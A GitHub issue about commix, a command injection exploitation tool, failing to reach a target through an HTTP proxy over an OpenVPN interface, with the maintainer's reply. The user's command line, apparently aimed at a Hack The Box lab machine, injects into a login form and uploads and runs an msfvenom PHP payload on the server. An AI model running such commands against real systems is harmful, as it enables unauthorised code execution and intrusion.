search

commixproject / commix

Automated All-in-One OS Command Injection Exploitation Tool.
https://commixproject.com
Other
4.54k stars 808 forks source link

Commix fails to use HTTP proxy through VPN network interface #546

Closed zar3bski closed 3 years ago

zar3bski commented 3 years ago

What's the problem (or question)?

commix does not seem able to handle proxies in every situation. The following curl works

curl --proxy "http://10.10.10.200:3128" http://172.31.179.1/intranet.php -v

while commix times out

python  commix.py --url="http://172.31.179.1/intranet.php" --proxy="http://10.10.10.200:3128" --data="Username=INJECT_HERE&Password=sdcsdc" --file-write="/home/zar3bski/Documents/Notes/htb_unbalanced/payloads/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"  --random-agent

[info] The fetched random HTTP User-Agent header value is 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'.
[info] Checking connection to the target URL.           
[critical] Connection timed out.

Do you have an idea for a solution?

The proxy is not accessible through wlp6s0 or any other 'standard' network interfaces but through tun0, a network interface established by openvpn. I am not sure how commix finds and chooses the relevant network interface (could not find an option for it in the documentation) but it is possible that it fails to work with tun0

What are the running context details?

Tried with

stasinopoulos commented 3 years ago

Hello @zar3bski, Commix supports SOCKS4/SOCKS5 proxies (please cross-check that works with Burp). Currently, there is no support for HTTP proxy through VPN network interface.

zar3bski commented 3 years ago

I'll check with Burp ASAP. I'll also have a look at the source code, for I am surprised about this SOCKS4/SOCKS5 only support. I noticed that commix does not seem to use requests but somehow defines a whole requests library of its own (injections related reasons I guess). Is this the reason for the current limitation?